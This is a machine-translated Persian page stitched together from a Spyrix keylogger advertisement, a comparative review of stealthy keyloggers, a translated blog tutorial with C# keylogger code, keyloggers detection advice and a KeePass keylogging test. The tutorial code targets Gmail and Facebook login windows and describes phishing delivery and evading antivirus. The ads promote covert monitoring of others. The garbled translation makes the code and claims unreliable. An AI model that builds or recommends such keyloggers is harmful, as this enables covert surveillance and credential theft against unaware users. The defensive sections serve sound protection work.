رهگیر صفحه کلید نیاز به یک جاسوسی صفحه کلید دارید؟ مکان های ضعیف و از بین بردن آنها

چرا نیاز به keyloggers (جاسوس صفحه کلید):
1. کنترل کودکان و عزیزان
Spyrix Keylogger رایگان اجازه می دهد تا شما را به کنترل استفاده از کامپیوتر خود را به فرزندان خود را. شما فرزندان خود را از اطلاعات ناخواسته در اینترنت (جنسیت، مواد مخدر، خودکشی، قمار، و غیره) محافظت خواهید کرد و از ارتباطات با افراد خطرناک محافظت می کنید.
2. کنترل کارکنان و حفاظت در برابر نشت اطلاعات.
Spyrix Keylogger رایگان می تواند برای نظارت بر مکاتبات کارکنان در کامپیوتر کار و کنترل استفاده از زمان کار استفاده شود.
Spyrix Keylogger رایگان ویژگی های اصلی:

  • جدید! نظارت از راه دور از طریق یک حساب کاربری امنکافی است برای دسترسی به رایانه ای که باید مشاهده شود و برنامه رایگان Keylogger Spyrix را در آنجا نصب کنید. در آینده، شما می توانید اطلاعات دریافت شده را از طریق حساب وب از هر جایی که اینترنت و هر دستگاه (رایانه، لپ تاپ، قرص یا گوشی هوشمند) وجود دارد را مشاهده کنید.
  • Keylogger (جاسوسی صفحه کلید)نوشتن در اطلاعات ورود به سیستم در کلید های صفحه کلید (ذخیره حتی کاراکترهای راه دور)
  • 100٪ توسط برنامه های آنتی ویروس شناسایی نشده استآنتی ویروس ها و برنامه های کاربردی ضد جاسوسی اغلب بسیاری از چنین برنامه های کاربردی را تشخیص می دهند. Spyrix Keylogger Free کاملا از برنامه های ضد ویروس، ضد rootkit و anti-spyware پنهان شده است.
  • حذف از راه دورشما می توانید Spyrix Keylogger را از راه دور از طریق یک حساب وب حذف کنید.
  • ردیابی برنامه هامشاهده تمام برنامه های در حال اجرا، از جمله بازی ها
  • عکس های روی صفحه نمایش (تصاویر)ایجاد تصاویر به طور قابل توجهی توانایی نظارت بر کامپیوتر را گسترش می دهد و به شما امکان می دهد عکس های فوری هر برنامه (از جمله ICQ، اسکایپ، و غیره) و وب سایت ها را به دست آورید (به عنوان مثال، Vkontakte، همکلاسی ها)
  • فعالیت کاربرSpyrix Keylogger رایگان فعالیت و عدم فعالیت کامپیوتر را ضبط می کند
  • کنترل دیسک قابل جابجایی (USB، HDD، SD)
  • چاپگر کنترل

Spyrix Keylogger Free - قوی ترین keylogger رایگان از بازار ارائه شده است. Spyrix Keylogger رایگان تنها یک CaLogger رایگان است، که یک ویژگی نظارت از راه دور را فراهم می کند.

پنجره اصلی:

حساب محافظت شده وب:


تنظیمات جادوگر:

هنگامی که بسیاری از مردم به یک کامپیوتر دسترسی دارند، نرم افزارهای جاسوسی مختلف مورد نیاز است.

در این شرایط، کاربر ممکن است بخواهد متوجه شود که کدام سایت ها از رایانه خود بازدید می کنند (به عنوان مثال، کودکان)، آیا سرقت با کارت های اعتباری با استفاده از گذرواژههای ذخیره شده و غیره مورد نیاز نیست. برای روشن شدن این مسائل و مورد نیاز است.

بررسی ما به شما این امکان را می دهد که انتخابی مطلوب را انتخاب کنید.

ویژگی های انتخاب

جاسوسی صفحه کلید ماهیت آن چیست؟ این یک برنامه است که به شدت صحبت می کند، به طور مستقیم به صفحه کلید مربوط نیست.

این در حافظه کامپیوتر نصب شده و اعمال می شود. اغلب، نشانه های فعالیت آن بر روی کامپیوتر قابل مشاهده نیست، اگر نه به دنبال آنها به طور هدفمند.

چنین برنامه ای به طور غیر مستقیم با صفحه کلید تعامل دارد، یعنی، آن را با یک برنامه PC کار می کند که سیگنال های ورود به پردازنده را به عنوان یک نتیجه از فشار دادن دکمه ها، در متن هنگام چاپ، تبدیل می کند.

به عبارت دیگر، اقدام چنین نرم افزاری در جمع آوری اطلاعات وارد شده از طریق صفحه کلید هدایت می شود.

چنین خدماتی از انواع مختلفی هستند - با برخی، شما می توانید تمام متن تایپ شده از صفحه کلید را مشاهده کنید، با استفاده از دیگران - فقط یکی از آنها در مرورگر یا در هر برنامه انتخاب شده شماره گیری شده است.

برخی از برنامه ها توانایی پیکربندی چنین شاخص هایی را فراهم می کنند، دیگران نیستند.

آنها همچنین با توجه به درجه خفا، از یکدیگر متفاوتند. به عنوان مثال، فعالیت یک واضح است، یک برچسب بر روی دسکتاپ باقی می ماند، و غیره، چنین برنامه ها برای کنترل فعالیت ها مانند کودکان مناسب هستند.

ردیابی حضور و فعالیت های دیگران قابل توجه نیست - آنها عمل پنهان و مناسب برای نصب بر روی کامپیوتر شخص دیگری زمانی که واقعیت نصب باید از یک کاربر شخص ثالث پنهان شود.

با توجه به چنین گونه ای، انتخاب مناسب ترین نرم افزار را می توان بسیار دشوار است.

این مواد بهترین برنامه های برتر را ارائه می دهد که می توانند برای این منظور استفاده شوند. در میان آنها آسان تر انتخاب مناسب است.

مشخصات فنی

برای ساده سازی فرآیند انتخاب نرم افزار در جدول، قرار داده شده در زیر، حاوی ویژگی های مقدماتی اصلی تمام برنامه های موجود در بالا است.

نامنوع مجوزنوع اطلاعات جمع آوری شدهکاربردیطرح
sc-keylogرایگان استهمهوسیعساده شده
WIDESTEP Keylogger مفید است.رایگان / کاغذهمهوسیعبهبود یافته
جاسوسی واقعیپرداخت شدههمهخیلی عریضاستاندارد
elitekylogger.پرداخت شدههمهوسیعاستاندارد
موش!رایگان / کاغذکمتر از قبلبسیار گستردهنوتوسی
spygoرایگان استبسته به نسخهبسته به نسخهطراحی استاندارد ویندوز
Ardamax Keylogger 2.9رایگان استاز صفحه کلیدتنگ شدهساده شده
مانیتور شخصی NS Keylogger 3.8رایگان استهمهتنگ شدهساده شده
جاسوسی KGBپرداخت شدهاز صفحه کلید + برنامه های بازمحدود، تنگجلگه
Keylogger طلایی 1.32.رایگان استاز صفحه کلیدخیلی باریکجلگه

بر اساس ویژگی های این جدول، آسان است که برنامه را به صورت مناسب انتخاب کنید.

اطلاعات بیشتر در مورد این خدمات نیز در زیر شرح داده شده است.

sc-keylog

این یک برنامه جاسوسی و جاسوسی است که به صورت رایگان توزیع می شود.

علاوه بر ردیابی به طور خاص، اطلاعات وارد شده از صفحه کلید قادر به جمع آوری، آدرس های سایت های بازدید شده، کلمه عبور، پنجره های باز در مرورگر است.

اطلاعات کامل در مورد تمام اقدامات تولید شده بر روی کامپیوتر را ارائه می دهد. در این مورد، فایل قابل شکل گیری را می توان از راه دور از دستگاه دیگری مشاهده کرد.

  • توانایی دسترسی از راه دور به فایل از دستگاه دیگری؛
  • عدم اثبات فعالیت های برنامه بر روی کامپیوتر با تنظیمات مناسب؛
  • داده های مختلف جمع آوری شده - عملا اطلاعات در مورد تمام اقدامات بر روی کامپیوتر را می توان در دسترس است.
  • رمز عبور را فقط بیشتر از NT0 نگه می دارد؛
  • منو خیلی ساده و طراحی غیر روانشناسی؛
  • فرمت نمایش نتایج به اندازه کافی ناراحت کننده.

و کاربران چه می گویند چه کسی به طور فعال این نرم افزار را اعمال می کند؟ "مطلق نامرئی برای کاربر"، "داده ها به طور منظم به ایمیل می آیند."

WIDESTEP Keylogger مفید است.

این برنامه به صورت رایگان به صورت رایگان اعمال می شود. قیمت نسخه کامل پرداخت شده 35 دلار است.

یک برنامه جالب و کاربردی که پول خود را صرف می کند، اگر آماده باشید آنها را پرداخت کنید.

صفت متمایز - توانایی ارسال اطلاعات ضبط شده در فرکانس مشخص شده. بقیه کار می کند خوب، اغلب برنامه های دیگر پایدار تر از این لیست.

  • جمع آوری اطلاعات از انواع مختلف؛
  • نامرئی کامل کامپیوتر کاربر؛
  • رابط کاربری ساده و مدیریت.
  • طراحی بهتر از برنامه قبلی است، اما هنوز هم در ارتفاع نیست؛
  • فرمت صفحه نمایش ناخوشایند است
  • نسخه پرداخت شده بسیار گران است.

نظرات کاربران در مورد این نرم افزار به شرح زیر است: "برنامه راحت، ساده و کاربردی. کاملا نامرئی در هنگام کار. "

جاسوسی واقعی

این یک برنامه کاربردی و پیچیده پرداخت شده به ارزش 600 روبل است. با این حال، این نسخه تظاهرات رایگان را به صورت رایگان ارائه می دهد.

ویژگی این نرم افزار - توانایی در یک دوره مشخص از زمان.

این کمک می کند تا مشکل ورود به رمز عبور / کلید گرافیکی را حل کند، که اخیرا گسترش گسترده ای شده است.

  • بسیاری از انواع اطلاعات جمع آوری شده به همراه توانایی تصاویر از صفحه نمایش در دوره مشخص شده؛
  • تعداد زیادی از ویژگی های اضافی و ویژگی های دیگر؛
  • نه تنها اقدامات، بلکه زمان اعدام آنها را نیز می نویسد؛
  • رمزگذاری مجله تشکیل شده است.
  • مدت زمان کار (جمع آوری اطلاعات) در نسخه آزمایشی رایگان 40 دقیقه است؛
  • توزیع پرداخت شده، هر چند قیمت بیشتر یا کمتر قابل قبول؛
  • وزن بسیار زیادی از برنامه.

بررسی کاربر در مورد این برنامه به شرح زیر است: "برنامه عالی است. برنامه نویسان خوب انجام شده! "

elitekylogger.

برنامه پرداخت شده با قیمت نسبتا بالا - 69 دلار. این عمل بر روی کامپیوتر به طور کامل بدون توجه به حالت پایین سطح، بنابراین تقریبا به طور کامل قابل تشخیص است.

ویژگی جالب و راحت - راه اندازی اتوماتیک SOFTE به طور همزمان با شروع سیستم خود اشغال می شود.

دشوار است که تشخیص داده شود یا حتی حتی با ضد دوچرخه سواری خاص شناسایی نشود.

  • عمل کاملا شکسته و پیچیدگی در تشخیص؛
  • فرمت نوع درایور سطح پایین و شروع خودکار هنگام بارگیری سیستم؛
  • همچنین مسیر نه تنها اصلی، بلکه کلید های خدماتی را بر روی صفحه کلید نگه می دارد.
  • یک سیستم نسبتا پیچیده نصب برنامه PC؛
  • هزینه بالای برنامه، اما در اینترنت روسیه شما می توانید یک نسخه هک قدیمی را پیدا کنید؛
  • سیستم پیچیده ای از تنظیمات برنامه فردی که، با این حال، خود را توجیه می کند.

کاربران در مورد این نرم افزار چه می گویند؟ "یک برنامه خوب"، "کمی به JetLogger نمی رسد."

موش!

ابزار بسیار معمول و محبوب، کاربردی با مجوز پرداخت شده.

با این حال، یک نسخه تظاهرات رایگان از یک دوره محدود از اقدام برای استفاده شخصی ارائه شده است.

این برنامه بسیار ساده است - هر کاربر پیشرفته را بنویسید. با این حال، به طور کامل برای آنتی ویروس ها و برنامه های ویژه ای که چنین نرم افزاری را کشف می کنند، کاملا خسته کننده است.

  • سادگی، عملکرد و ثبات بالا کار؛
  • حداقل وزن فایل و محل اشغال شده توسط آن بر روی کامپیوتر؛
  • تنظیمات زیادی وجود دارد.
  • طراحی بسیار ناخوشایند ساخته شده در رنگ های سیاه، سفید و قرمز؛
  • قابلیت تا حدودی تا حدودی از برنامه های توصیف شده قبل از آن است؛
  • مشاهده ناراحتی از مجله و به طور کلی رابط کاربری ناراحت کننده و استفاده.

کاربران در مورد این برنامه به صورت زیر صحبت می کنند: "کار پایدار، اما خسته کننده"، "برنامه خوب است، اجازه می دهد تا شما را به جمع آوری داده های بدون توجه."

spygo

این یک Keyloger جدید است که طراحی شده است تا توسط برنامه نویس روسی کار کند.

دنیای هکر را می توان به سه گروه مهاجم تقسیم کرد:


1) Skids (Script Kiddies) - کودکان و نوجوانان، هکرهای تازه کار که جمع آوری قطعات شناخته شده کد و آب و برق و استفاده از آنها ایجاد برخی از نرم افزار مخرب.


2) "Byuers" - نه کارآفرینان خالص، نوجوانان و دیگر دوستداران احساسات حاد. خرید خدمات برای نوشتن چنین نرم افزاری در اینترنت، جمع آوری اطلاعات شخصی مختلف با کمک آن، و شاید آن را دوباره فروخت.


3) Cooders کلاه سیاه - گورو برنامه نویسی و خبرنگاران معماری. آنها کد را در دفترچه یادداشت می نویسند و سوء استفاده های جدیدی را از ابتدا توسعه می دهند.


آیا کسی می تواند با مهارت های خوب در برنامه نویسی تبدیل شود؟ من فکر نمی کنم که پس از بازدید از چندین جلسه DEFCON، شروع به ایجاد چیزی مانند Regin (Link) کنید. از سوی دیگر، من معتقدم که کارمند IB باید برخی مفاهیم را که در آن نرم افزارهای مخرب ساخته شده اند، کار کنند.


چرا پرسنل IB این مهارت های مشکوک هستند؟


دشمنت را بشناس. همانطور که قبلا در وبلاگ درون وبلاگ بحث کرده ایم، باید به عنوان یک نقض کننده فکر کنید تا آن را متوقف کنید. من متخصص در امنیت اطلاعات در Varonis هستم و در تجربه من - اگر شما درک کنید که چه حرکات نقض کننده را انجام می دهند، قوی تر خواهد شد. بنابراین، من تصمیم گرفتم مجموعه ای از پست ها را در مورد جزئیات که زیر نرم افزار مخرب و خانواده های مختلف هکرها را ارائه می دهند، شروع کنم. پس از درک اینکه چقدر آسان است که ایجاد نشود، ممکن است بخواهید سیاست های امنیتی را در شرکت خود تجدید نظر کنید. در حال حاضر جزئیات بیشتر.


برای این کلاس غیر رسمی "هک کردن 101" شما نیاز به دانش کوچک در برنامه نویسی (C # و Java) و درک پایه معماری ویندوز دارید. به یاد داشته باشید که در واقع، نرم افزار مخرب بر روی C / C ++ / دلفی نوشته شده است تا به چارچوب بستگی ندارد.


keyloger


Cailoger یک نرم افزار یا نوعی از دستگاه فیزیکی است که می تواند دستگیری و حفظ کلید های فشار بر روی یک دستگاه آسیب دیده باشد. این را می توان به عنوان یک تله دیجیتال برای هر کلیک بر روی کلیدهای صفحه کلید نشان داده شود.
اغلب این ویژگی به عنوان مثال، نرم افزار پیچیده تر، به عنوان مثال، تروجان ها (موشهای تروجان دسترسی از راه دور) معرفی شده است، که تحویل داده های متوقف شده را به مهاجم ارائه می دهد. همچنین Keylogeres سخت افزار وجود دارد، اما آنها کمتر رایج هستند، زیرا نیاز به دسترسی فیزیکی مستقیم به دستگاه دارد.


با این وجود، ایجاد توابع اساسی Keylogere برنامه نسبتا آسان است. اخطار. اگر می خواهید چیزی را از موارد زیر امتحان کنید، اطمینان حاصل کنید که مجوز دارید، و شما به محیط موجود آسیب نمی رسانید، اما بهترین آن را در یک VM جداگانه انجام دهید. علاوه بر این، این کد بهینه سازی نخواهد شد، من فقط به شما ردیف کد را نشان می دهم که می تواند این کار را انجام دهد، مسیر ظریف یا مطلوب نیست. و در نهایت، من نمی توانم بگویم چگونه Keylogher مقاوم به راه اندازی مجدد و یا سعی کنید آن را کاملا به لطف تکنیک های برنامه نویسی خاص، و همچنین در مورد حفاظت در برابر حذف، حتی اگر آن را کشف شد، کشف نشده است.



برای اتصال به صفحه کلید، فقط باید از 2 خط در C # استفاده کنید:


1. 2. 3. عمومی استاتیک خارجی int getasynckeystate (INT32 I)؛

شما می توانید بیشتر در مورد GetasynckeyState جابجایی در MSDN کشف کنید:


برای درک: این ویژگی کلیدها را تعیین می کند یا در زمان تماس فشار داده می شود و پس از تماس قبلی فشار داده شد. در حال حاضر ما دائما این ویژگی را برای دریافت داده ها از صفحه کلید تماس می گیریم:


1. در حالی که (درست) 2. (3. Thread.Sleep (100)؛ 4. برای (INT32 I \u003d 0؛ I< 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. }

اینجا چه خبره؟ این چرخه هر 100 میلی ثانیه هر یک از کلیدها را برای تعیین وضعیت آن مصاحبه خواهد کرد. اگر یکی از آنها فشرده شود (یا فشرده شده است)، پیام در کنسول نمایش داده خواهد شد. در زندگی واقعی، این داده ها بافر و فرستاده شده توسط مهاجم ارسال می شود.


keyloger هوشمند

صبر کنید و این که آیا منطقی است که سعی کنید تمام اطلاعات را از همه برنامه ها شلیک کنید؟
کد بالا ورودی خام را از صفحه کلید از هر پنجره و فیلد ورودی که در حال حاضر تمرکز است، می کشد. اگر هدف شما تعداد کارت های اعتباری و کلمه عبور باشد، این رویکرد بسیار موثر نیست. برای سناریوها از دنیای واقعی، زمانی که چنین keyloggers بر روی صدها یا هزاران دستگاه انجام می شود، تجزیه داده های بعدی می تواند بسیار طولانی تبدیل شود و با توجه به کل، از دست دادن معنای، زیرا ارزشمند برای اطلاعات هکرها ممکن است تا آن زمان از بین برود.


بیایید فرض کنیم که من می خواهم مدارک فیس بوک یا Gmail را برای فروش بعدی خریداری کنم. سپس ایده جدید این است که تنها زمانی که پنجره مرورگر فعال است، Keylogging را فعال کنید و کلمه Gmail یا فیس بوک در عنوان فعال باشد. با استفاده از این روش، من شانس دریافت اعتبار را افزایش می دهم.


نسخه دوم کد:


1. در حالی که (درست) 2. (3. INTPTR Handle \u003d GetForeGroundWindow ()؛ 4. اگر (GetWindowText (دسته، Buff، Chars)\u003e 0) 5. (6. رشته رشته \u003d buff.tostring ()؛ 7. اگر (line.contains ("Gmail") || Line.Contains ("فیس بوک - ورود یا ثبت نام")) 8. (9. // چک کردن صفحه کلید 10.) 11.) 12. Thread.Sleep (100)؛ 13.)

این قطعه یک پنجره فعال را هر 100 میلی ثانیه تشخیص می دهد. این کار با استفاده از عملکرد GetForeGroundWindow انجام می شود (اطلاعات بیشتر در مورد MSDN). عنوان صفحه در یک متغیر Buff ذخیره می شود، اگر حاوی Gmail یا فیس بوک باشد، قطعه اسکن صفحه کلید نامیده می شود.


این ما تنها زمانی که پنجره مرورگر در سایت های فیس بوک و Gmail باز است، اسکن صفحه کلید را ارائه می دهیم.


حتی Keyloger هوشمندانه تر


بیایید فرض کنیم که مهاجم قادر به دریافت این کد در برابر ما بود. همچنین فرض کنید که او به اندازه کافی بلندپروازانه است و می تواند ده ها یا صدها هزار اتومبیل را آلوده کند. نتیجه: یک فایل بزرگ با گیگابایت متن که در آن اطلاعات لازم هنوز باید یافت شود. وقت آن است که با عبارات منظم یا regex آشنا شوید. این چیزی است که در شباهت یک مینی زبان برای کامپایل برخی از قالب ها و متن اسکن برای مطابقت با قالب های مشخص شده است. شما می توانید اینجا بیشتر بیاموزید.


برای ساده کردن، من بلافاصله عبارات آماده ساخته شده را که مربوط به نام ورود و رمز عبور است، به ارمغان می آورم:


1. // ما به دنبال یک آدرس پستی 2. ^ [\\ W # $٪ & "* + \\ - / \u003d \\ ^ _`!؟ (|) ~].! + (\\ [\\ W # $٪ و "* + \\ - / \u003d \\ ^ _` (|) ~] +) * @ ((([\\ - \\ W] + \\) + (2.4).) | (((1،3) \\. )) (3) (1،3)) $ 3. 4. 5. // ما به دنبال رمز 6. (؟ \u003d ^. (6) $) (؟ \u003d. * \\ D) (؟ \u003d. *)

این عبارات در اینجا به عنوان یک نکته ای از آنچه می توان با استفاده از آنها انجام داد. با کمک عبارات منظم، می توانید هر طرح هایی را که دارای فرمت خاص و ثابت مانند شماره گذرنامه، کارت های اعتباری، حساب ها و حتی کلمه عبور هستند، جستجو کنید.
در واقع، عبارات منظم نوع کد قابل خواندن نیست، اما آنها برخی از بهترین دوستان برنامه نویس هستند، اگر وظایف تجزیه متن وجود دارد. در زبان های جاوا، C #، جاوا اسکریپت و دیگر محبوب در حال حاضر توابع آماده ساخته شده است که در آن شما می توانید عبارات معمولی معمولی را انتقال دهید.


برای C # به نظر می رسد این است:


1. Regex Re \u003d جدید regex (@ "^ [\\ w! # $٪ &" * + \\ - / \u003d؟ \\ ^ _ `(|) ~] + (\\\\ [\\ w! # $٪ و" * + \\ - / \u003d \\ ^ _ `(|) ~] +) * @ ((([\\ - \\ W] + \\) + (2.4).) |. ((((1،3) \\) ( 3) (1.3))) $ ")؛ 2. Regex Re2 \u003d جدید Regex (@ "(؟ \u003d ^. (6،) $) (؟ \u003d. * \\ d) (؟ \u003d * *)")؛ 3. رشته ایمیل \u003d " [ایمیل محافظت شده]"؛ 4. STRING PASS \u003d" ABCDE3FG "؛ 5. نتیجه بازی \u003d Re.Match (ایمیل)؛ 6. بازی Result2 \u003d RE2.Match (PASS)؛

جایی که اولین عبارت (RE) به هر ایمیل متصل می شود و هر دوم (RE2) هر طراحی الفبای دیجیتال بیش از 6 کاراکتر است.


رایگان و به طور کامل شناسایی نشده است


به عنوان مثال، من از ویژوال استودیو استفاده کردم - شما می توانید از محیط مورد علاقه خود استفاده کنید - برای ایجاد چنین keyloger در 30 دقیقه.
اگر من یک مهاجم واقعی بودم، من به برخی از اهداف واقعی (سایت های بانکی، شبکه های اجتماعی، TP) هدف قرار گرفتم و کد را برای انطباق با این اهداف اصلاح کردم. البته، من نیز یک کمپین فیشینگ را با ایمیل با برنامه ما، تحت پوشش یک حساب منظم یا سایر پیوست ها راه اندازی خواهم کرد.


یک سوال باقی می ماند: واقعا برای برنامه های محافظتی شناسایی نخواهد شد؟


من کدم را کامپایل کردم و فایل EXE را در وب سایت VirusTotal بررسی کردم. این یک ابزار وب است که فایل هش را که شما دانلود کرده اید محاسبه می کند و آن را در پایگاه داده های شناخته شده از ویروس های شناخته شده جستجو می کند. تعجب! به طور طبیعی، هیچ چیز یافت نشد



این تراشه اصلی است! شما همیشه می توانید کد را تغییر دهید و توسعه دهید، همیشه چند مرحله ای زودتر از تهدید اسکنر ها وجود دارد. اگر شما قادر به نوشتن کد خودتان هستید، تقریبا تضمین نمی شود. در این صفحه شما می توانید با تجزیه و تحلیل کامل آشنا شوید.


هدف اصلی این مقاله نشان می دهد که استفاده از آنتی ویروس های به تنهایی شما قادر به اطمینان از امنیت در شرکت نخواهید بود. لازم است بهتر ارزیابی اقدامات همه کاربران و حتی خدمات برای شناسایی اقدامات بالقوه مخرب باشد.


در مقاله زیر، من نشان خواهم داد که چگونه یک نسخه واقعا بدون تشخیص این نرم افزار را ایجاد کنم.

چگونه به دنبال جاسوس های صفحه کلید

hitters keyloggers نبودند، اما آنها می توانند شناسایی شوند. چندین راه وجود دارد.

  • جستجو بر اساس امضا

این روش به شما اجازه می دهد تا به طور دقیق حضور جاسوسی های صفحه کلید را تعیین کنید، انتخاب صحیح امضا ها می تواند احتمال خطای صفر را کاهش دهد. اما اسکنر امضای قادر به شناسایی اشیائی که قبلا شناخته شده و توصیف شده در پایگاه داده آن را شناسایی کرده است، بنابراین نیاز به یک پایگاه بزرگ و به طور مداوم به روز شده است.


  • الگوریتم های اکتشافی

این روش بر اساس ویژگی های مشخصه خود، یک Cailoger را پیدا می کند و به شما اجازه می دهد تا تله های صفحه کلید استاندارد را شناسایی کنید. همانطور که مطالعات نشان داد، صدها برنامه امن که جاسوس های صفحه کلید نیستند، تله ها را برای ردیابی موس و ورودی از صفحه کلید نصب می کنند. به عنوان مثال، برنامه شناخته شده Punto Switcher، نرم افزار از صفحه کلید چند رسانه ای و موش ها.

  • نظارت بر توابع API که از جاسوس استفاده می کنند

این روش بر اساس رهگیری تعدادی از توابع استفاده شده توسط جاسوسی های صفحه کلید، مانند SetWindowShookex، Unhookwindowshookex، GetASynCkeyState، GetKeyBoardState است.

ردیابی رانندگان، فرایندها، خدمات مورد استفاده توسط سیستم

این روش نه تنها برای ردیابی keyloggers مناسب است. گزینه ساده ترین استفاده این است که از یک برنامه بازرس Kaspersky استفاده کنید که ظاهر را در سیستم فایل های جدید نظارت می کند.

چگونه برای محافظت در برابر keyloggers

اغلب Keyloggers مشهور در حال حاضر به پایگاه داده اضافه شده است، و بنابراین تکنیک حفاظت همانند از هر نرم افزار مخرب است:

  • نصب محصول آنتی ویروس؛
  • پشتیبانی از پایگاه داده واقعی

شایان ذکر است که اکثر برنامه های آنتی ویروس شامل keyloggers به \u200b\u200bکلاس نرم افزار بالقوه خطرناک هستند، و در اینجا لازم است مشخص شود که در تنظیمات پیش فرض، محصول ضد ویروس، حضور این نوع برنامه را تشخیص می دهد. اگر نه، لازم است تنظیمات را به صورت دستی تنظیم کنید تا از رایج ترین جاسوسان محافظت کنید.

به طور کلی، به عنوان Keyl Agers با هدف جاسوسی برای داده های محرمانه هدف قرار می گیرند، باید به روش های ایمنی زیر بپیوندید:

استفاده از کلمه عبور یکبار مصرف / احراز هویت دو عامل

با استفاده از سیستم های حفاظت پیشگیرانهاجازه دادن به کاربر برای نصب / فعال کردن برنامه های کاربردی

با استفاده از یک صفحه کلید مجازینشان دادن صفحه کلید بر روی صفحه نمایش در قالب یک تصویر به شما اجازه می دهد تا از نرم افزارهای نرم افزاری و سخت افزاری محافظت کنید.

جستجو و حذف جاسوس های صفحه کلید

چه راهی برای محافظت در برابر این قدرت ناپایدار؟

  • هر برنامه آنتی ویروس
  • آب و برق با مکانیسم های امضا و اکتشافی (به عنوان مثال، AVZ).
  • نرم افزار ها و برنامه های با هدف شناسایی جاسوسی های صفحه کلید و مسدود کردن کار آنها. این روش حفاظت موثرتر است، زیرا این نرم افزار بلوک، به عنوان یک راه، تقریبا تمام انواع keyloggers.

شایان ذکر است که نرم افزار با هدف Capet-Spies دارای دو ویژگی است: نرم افزار این نوع عمدتا پرداخت می شود و به ندرت روسی ارائه می شود.

به عنوان مثال، نرم افزار رایگان انگلیسی زبان فرانسوی پیشرفته Spyware Remover - از برنامه های تبلیغاتی، تماس ها، نرم افزارهای جاسوسی، keyloggers و غیره حذف می کند

نصب استاندارد است، شما باید "بعدی" را فشار دهید تا اشتباه شود. پس از نصب، پیشنهاد شده است تا برنامه را شروع کنید. برای اسکن، روی «اسکن کن اکنون» کلیک کنید.

درست است، شایان ذکر است که این برنامه 3 سال به روز نشده است.

به طور کلی، این برنامه رجیستری سیستم را برای حضور برنامه های مخرب در آن بررسی می کند. این ابزار دارای برخی از قابلیت ها است، در نتیجه به شما امکان می دهد لیستی از برنامه های قابل دانلود را هنگام شروع سیستم عامل ("Hijack Scan → STARTUP") نمایش دهید، لیستی از خدمات را نمایش دهید، پورت های فعال را نشان دهید، "کوکی ها" اینترنت اکسپلورر را تماشا کنید و غیره بعد از آن اسکن، یک پنجره مشابه ظاهر خواهد شد:

اگر به چیزی توجه کنید و می توانید از Spyware Terminator 2012 استفاده کنید (هرچند نه با خیال راحت). این ابزار می تواند تقریبا تمام انواع نرم افزارهای مخرب را شناسایی و حذف کند. سیستم امنیتی داخلی ساخته شده حفاظت از برنامه ها و سیستم ها را فعال می کند، ابزار را به طور مستقیم با شبکه متصل می کند.

  • کلیپ بورد Interception،
  • رهگیری از پرس های صفحه کلید،
  • رد متن از ویندوز

و خیلی بیشتر. Anti-Keylogger از پایگاه های امضا استفاده نمی کند، زیرا تنها بر اساس الگوریتم های اکتشافی است. Anti-Keylogger قادر به محافظت در برابر حملات هدفمند است که بسیار خطرناک و محبوب با سایبری ها هستند. به ویژه به طور موثر در مبارزه با جاسوس های صفحه کلید بر اساس استفاده از تله ها، بررسی چرخه ای و فیلتر درایور صفحه کلید.

Anti-Keylogger دارای یک گزینه رایگان است، زمان استفاده محدود - 10 جلسه کاری، هر 2 ساعت، که به اندازه کافی برای بررسی کامپیوتر در یک زمان کافی است.

بنابراین، آنچه ما داریم:

  1. Keyloggers به \u200b\u200bعنوان نرم افزار حقوقی قرار می گیرند، اما بسیاری از کاربران را می توان به سرقت اطلاعات شخصی کاربران استفاده کرد.
  2. امروزه Keyloggers، همراه با فیشینگ و غیره، تبدیل به یکی از روش های اصلی تقلب الکترونیکی شده اند.
  3. افزایش تعداد برنامه های مخرب با قابلیت Keyloggers وجود دارد.
  4. توزیع Keyloggers نرم افزار بر اساس فن آوری های Rootkit، که باعث می شود آنها را نامرئی به اسکنر کاربر و آنتی ویروس.
  5. برای شناسایی واقعیت جاسوسی با استفاده از جاسوسی صفحه کلید، استفاده از ابزار تخصصی حفاظت مورد نیاز است.
  6. نیاز به حفاظت از چند سطح (محصولات ضد ویروس با عملکرد تشخیص نرم افزار خطرناک، ابزار حفاظت پیشگیرانه، صفحه کلید مجازی).

نظر خود را ترک کنید

برای بررسی امنیت رمز عبور وارد شده از طریق KeePass، تصمیم گرفتم ساده ترین keylogger را با ضبط اضافی داده ها از کلیپ بورد بنویسید. تمام کد چندین خط را در Freepascal انجام گرفت.

گذرواژهها، بدون اقدامات حفاظت اضافی و به درستی پیکربندی Keepass، همانطور که معلوم شد، کاملا آسیب پذیر است.

کد keylogger در چرخه تایمر قرار می گیرد، که هر 10 میلی ثانیه به روز می شود. ماژول ها استفاده می شود: ویندوز و کلیپ بوک.

// مقایسه وضعیت فعلی برای F: \u003d 0 تا 255 اگر A [F]<> getasynckeystate (f) سپس شروع / / واکنش به مطبوعات اگر keepass.Checked و (getasynckeystate (f) \u003d 0) سپس memo1.caption: \u003d memo1.caption + chr (f)؛ // واکنش به فشار دادن اگر نه keepass.Checked و (getasynckeystate (f)<> 0) سپس memo1.caption: \u003d memo1.caption + chr (f)؛ پایان؛ // وضعیت فعلی را برای F: \u003d 0 تا 255 انجام می دهیم [f]: \u003d getasynckeystate (f)؛ // ضبط هنگام تغییر Buffer Exchange<> clipboard.astext سپس شروع S: \u003d clipboard.astext؛ memo2.caption: \u003d memo2.caption + s + ""؛ پایان؛
برنامه Logger ساده به نظر می رسد این است:

در پنجره -Keyboard، کلیدها بدون ثبت نام ثبت نام و زبان ورودی نمایش داده می شوند. نماد نمایش داده می شود، تعداد کد کد کد: Chr (F) است. شما می توانید برنامه را برای صفحه نمایش صحیح تمام شخصیت ها نهایی کنید، اما این برای این مطالعه مورد نیاز نیست.

در پنجره -cleipboard، هنگام تغییر محتویات بافر، کپی می شود.

مکان های ضعیف و از بین بردن آنها

1. رمز عبور اصلی را وارد کنید

به طور پیش فرض، رمز عبور اصلی در KeePass بدون یک حالت امن وارد شده است، بنابراین به راحتی در Logger ساده تعیین می شود. این مهمترین مکان امنیتی است، زیرا در اینجا ما به کل پایگاه داده رمز عبور دسترسی پیدا می کنیم.

برای حل مشکل، شما باید تنظیمات امنیتی را فعال کنید "رمز عبور اصلی را در حالت امن وارد کنید (مانند UAC در ویندوز ویستا و بالاتر). این حالت به Logger اجازه دسترسی به صفحه کلید را نمی دهد. علاوه بر این، نمی توان آن را برای تعیین مکان فایل کلیدی نمیدانید.

این حالت تنها هنگام ورود به رمز عبور اصلی فعال می شود. در حفاظت از کلمه عبور دیگر بیشتر مورد بحث قرار خواهد گرفت.

2. بافر مبادله

